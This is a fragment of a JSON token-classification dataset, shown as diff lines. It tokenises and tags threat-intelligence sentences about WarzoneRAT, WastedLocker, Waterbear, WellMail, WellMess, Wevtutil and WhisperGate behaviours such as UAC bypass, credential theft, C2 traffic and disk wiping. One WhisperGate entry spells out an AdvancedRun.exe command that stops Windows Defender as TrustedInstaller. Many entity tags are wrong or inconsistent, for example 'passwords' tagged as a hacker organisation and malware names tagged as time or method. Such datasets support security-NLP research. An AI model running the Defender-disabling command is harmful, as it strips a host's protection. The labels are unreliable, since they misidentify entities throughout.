"\"mssecsvc2.0\"", + "with", + "the", + "display", + "name", + "\"Microsoft", + "Security", + "Center", + "(2.0)", + "Service.\"" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "use", + "`sdclt.exe`", + "to", + "bypass", + "UAC", + "in", + "Windows", + "10", + "to", + "escalate", + "privileges;", + "for", + "older", + "Windows", + "versions", + "WarzoneRAT", + "can", + "use", + "the", + "IFileOperation", + "exploit", + "to", + "bypass", + "the", + "UAC", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "perform", + "COM", + "hijacking", + "by", + "setting", + "the", + "path", + "to", + "itself", + "to", + "the", + "`HKCU\\Software\\Classes\\Folder\\shell\\open\\command`", + "key", + "with", + "a", + "`DelegateExecute`", + "parameter." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "the", + "capability", + "to", + "grab", + "passwords", + "from", + "numerous", + "web", + "browsers", + "as", + "well", + "as", + "from", + "Outlook", + "and", + "Thunderbird", + "email", + "clients." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "use", + "XOR", + "0x45", + "to", + "decrypt", + "obfuscated", + "code." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "disarm", + "Windows", + "Defender", + "during", + "the", + "UAC", + "process", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "send", + "collected", + "victim", + "data", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "enumerate", + "directories", + "on", + "a", + "compromise", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "the", + "ability", + "of", + "performing", + "remote", + "desktop", + "access", + "via", + "a", + "hVNC", + "window", + "for", + "decreased", + "visibility." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "masquerade", + "the", + "Process", + "Environment", + "Block", + "on", + "a", + "compromised", + "host", + "to", + "hide", + "it's", + "attempts", + "to", + "elevate", + "privileges", + "through", + "`IFileOperation`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "the", + "capability", + "to", + "install", + "a", + "live", + "and", + "offline", + "keylogger,", + "including", + "through", + "the", + "use", + "of", + "the", + "`GetAsyncKeyState`", + "Windows", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "relied", + "on", + "a", + "victim", + "to", + "open", + "a", + "malicious", + "attachment", + "within", + "an", + "email", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "create", + "`HKCU\\Software\\Classes\\Folder\\shell\\open\\command`", + "as", + "a", + "new", + "registry", + "key", + "during", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "use", + "a", + "variety", + "of", + "API", + "calls", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "communicate", + "with", + "its", + "C2", + "server", + "via", + "TCP", + "over", + "port", + "5200." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "use", + "PowerShell", + "to", + "download", + "files", + "and", + "execute", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "obtain", + "a", + "list", + "of", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "the", + "ability", + "to", + "inject", + "malicious", + "DLLs", + "into", + "a", + "specific", + "process", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "the", + "capability", + "to", + "act", + "as", + "a", + "reverse", + "proxy." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "add", + "itself", + "to", + "the", + "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", + "and", + "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UIF2IS20VK`", + "Registry", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "the", + "ability", + "to", + "control", + "an", + "infected", + "PC", + "using", + "RDP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "include", + "a", + "rootkit", + "to", + "hide", + "processes,", + "files,", + "and", + "startup." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "been", + "distributed", + "as", + "a", + "malicious", + "attachment", + "within", + "an", + "email." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "encrypt", + "its", + "C2", + "with", + "RC4", + "with", + "the", + "password", + "`warzone160\\x00`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "collect", + "compromised", + "host", + "information,", + "including", + "OS", + "version,", + "PC", + "name,", + "RAM", + "size,", + "and", + "CPU", + "details." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "been", + "install", + "via", + "template", + "injection", + "through", + "a", + "malicious", + "DLL", + "embedded", + "within", + "a", + "template", + "RTF", + "in", + "a", + "Word", + "document." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "has", + "the", + "ability", + "of", + "performing", + "remote", + "desktop", + "access", + "via", + "a", + "VNC", + "console." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "access", + "the", + "webcam", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WarzoneRAT", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "contains", + "junk", + "code", + "to", + "increase", + "its", + "entropy", + "and", + "hide", + "the", + "actual", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "perform", + "a", + "UAC", + "bypass", + "if", + "it", + "is", + "not", + "executed", + "with", + "administrator", + "rights", + "or", + "if", + "the", + "infected", + "host", + "runs", + "Windows", + "Vista", + "or", + "later." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "has", + "performed", + "DLL", + "hijacking", + "before", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "encrypt", + "data", + "and", + "leave", + "a", + "ransom", + "note." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "WastedLocker's", + "custom", + "cryptor,", + "CryptOne,", + "used", + "an", + "XOR", + "based", + "algorithm", + "to", + "decrypt", + "the", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "WastedLocker", + "payload", + "includes", + "encrypted", + "strings", + "stored", + "within", + "the", + ".bss", + "section", + "of", + "the", + "binary", + "file." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "enumerate", + "files", + "and", + "directories", + "just", + "prior", + "to", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "has", + "copied", + "a", + "random", + "file", + "from", + "the", + "Windows", + "System32", + "folder", + "to", + "the", + "<code>%APPDATA%</code>", + "location", + "under", + "a", + "different", + "hidden", + "filename." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "delete", + "shadow", + "volumes." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "modify", + "registry", + "values", + "within", + "the", + "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Internet", + "Settings\\ZoneMap</code>", + "registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "has", + "the", + "ability", + "to", + "save", + "and", + "execute", + "files", + "as", + "an", + "alternate", + "data", + "stream", + "(ADS)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker's", + "custom", + "crypter,", + "CryptOne,", + "leveraged", + "the", + "VirtualAlloc()", + "API", + "function", + "to", + "help", + "execute", + "the", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "identify", + "network", + "adjacent", + "and", + "accessible", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "enumerate", + "removable", + "drives", + "prior", + "to", + "the", + "encryption", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "checks", + "for", + "specific", + "registry", + "keys", + "related", + "to", + "the", + "<code>UCOMIEnumConnections</code>", + "and", + "<code>IActiveScriptParseProcedure32</code>", + "interfaces." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "can", + "execute", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "checked", + "if", + "UCOMIEnumConnections", + "and", + "IActiveScriptParseProcedure32", + "Registry", + "keys", + "were", + "detected", + "as", + "part", + "of", + "its", + "anti-analysis", + "technique." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "has", + "used", + "cmd", + "to", + "execute", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "has", + "a", + "command", + "to", + "take", + "ownership", + "of", + "a", + "file", + "and", + "reset", + "the", + "ACL", + "permissions", + "using", + "the", + "<code>takeown.exe", + "/F", + "filepath</code>", + "command." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "WastedLocker", + "created", + "and", + "established", + "a", + "service", + "that", + "runs", + "until", + "the", + "encryption", + "process", + "is", + "complete." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "has", + "used", + "DLL", + "side", + "loading", + "to", + "import", + "and", + "load", + "a", + "malicious", + "DLL", + "loader." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "has", + "the", + "ability", + "to", + "decrypt", + "its", + "RC4", + "encrypted", + "payload", + "for", + "execution." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "has", + "used", + "RC4", + "encrypted", + "shellcode", + "and", + "encrypted", + "functions." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "hook", + "the", + "<code>ZwOpenProcess</code>", + "and", + "<code>GetExtendedTcpTable</code>", + "APIs", + "called", + "by", + "the", + "process", + "of", + "a", + "security", + "product", + "to", + "hide", + "PIDs", + "and", + "TCP", + "records", + "from", + "detection." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "scramble", + "functions", + "not", + "to", + "be", + "executed", + "again", + "with", + "random", + "values." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "receive", + "and", + "load", + "executables", + "from", + "remote", + "C2", + "servers." + ], + "ner_tags": [ + "B-Org", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "has", + "deleted", + "certain", + "values", + "from", + "the", + "Registry", + "to", + "load", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "leverage", + "API", + "functions", + "for", + "execution." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "identify", + "the", + "process", + "for", + "a", + "specific", + "security", + "product." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "inject", + "decrypted", + "shellcode", + "into", + "the", + "LanmanServer", + "service." + ], + "ner_tags": [ + "B-Org", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "query", + "the", + "Registry", + "key", + "<code>\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\"</code>", + "to", + "see", + "if", + "the", + "value", + "`OracleOcilib`", + "exists." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "find", + "the", + "presence", + "of", + "a", + "specific", + "security", + "software." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "use", + "API", + "hooks", + "on", + "`GetExtendedTcpTable`", + "to", + "retrieve", + "a", + "table", + "containing", + "a", + "list", + "of", + "TCP", + "endpoints", + "available", + "to", + "the", + "application." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Waterbear", + "can", + "use", + "thread", + "injection", + "to", + "inject", + "shellcode", + "into", + "the", + "process", + "of", + "security", + "software." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "archive", + "files", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "use", + "hard", + "coded", + "client", + "and", + "certificate", + "authority", + "certificates", + "to", + "communicate", + "with", + "C2", + "over", + "mutual", + "TLS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "exfiltrate", + "files", + "from", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "decompress", + "scripts", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "receive", + "data", + "and", + "executable", + "scripts", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "use", + "TCP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "has", + "been", + "observed", + "using", + "TCP", + "port", + "25,", + "without", + "using", + "SMTP,", + "to", + "leverage", + "an", + "open", + "port", + "for", + "secure", + "command", + "and", + "control", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "identify", + "the", + "IP", + "address", + "of", + "the", + "victim", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMail", + "can", + "identify", + "the", + "current", + "username", + "on", + "the", + "victim", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "communicate", + "to", + "C2", + "with", + "mutual", + "TLS", + "where", + "client", + "and", + "server", + "mutually", + "check", + "certificates." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "has", + "the", + "ability", + "to", + "use", + "DNS", + "tunneling", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "send", + "files", + "from", + "the", + "victim", + "machine", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "decode", + "and", + "decrypt", + "data", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "identify", + "domain", + "group", + "membership", + "for", + "the", + "current", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "write", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "use", + "junk", + "data", + "in", + "the", + "Base64", + "string", + "for", + "additional", + "obfuscation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "execute", + "PowerShell", + "scripts", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "has", + "used", + "Base64", + "encoding", + "to", + "uniquely", + "identify", + "communication", + "to", + "and", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "encrypt", + "HTTP", + "POST", + "data", + "using", + "RC6", + "and", + "a", + "dynamically", + "generated", + "AES", + "key", + "encrypted", + "with", + "a", + "hard", + "coded", + "RSA", + "public", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "identify", + "the", + "computer", + "name", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "identify", + "the", + "IP", + "address", + "and", + "user", + "domain", + "on", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "collect", + "the", + "username", + "on", + "the", + "victim", + "machine", + "to", + "send", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WellMess", + "can", + "execute", + "command", + "line", + "scripts", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wevtutil", + "can", + "be", + "used", + "to", + "clear", + "system", + "and", + "security", + "event", + "logs", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wevtutil", + "can", + "be", + "used", + "to", + "export", + "events", + "from", + "a", + "specific", + "log." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wevtutil", + "can", + "be", + "used", + "to", + "disable", + "specific", + "event", + "logs", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "overwrites", + "the", + "MBR", + "with", + "a", + "bootloader", + "component", + "that", + "performs", + "destructive", + "wiping", + "operations", + "on", + "hard", + "drives", + "and", + "displays", + "a", + "fake", + "ransom", + "note", + "when", + "the", + "host", + "boots." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "WhisperGate", + "third", + "stage", + "can", + "use", + "the", + "AdvancedRun.exe", + "tool", + "to", + "execute", + "commands", + "in", + "the", + "context", + "of", + "the", + "Windows", + "TrustedInstaller", + "group", + "via", + "`%TEMP%\\AdvancedRun.exe\"", + "/EXEFilename", + "\"C:\\Windows\\System32\\sc.exe\"", + "/WindowState", + "0", + "/CommandLine", + "\"stop", + "WinDefend\"", + "/StartDirectory", + "\"\"", + "/RunAs", + "8", + "/Run`." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WhisperGate", + "can", + 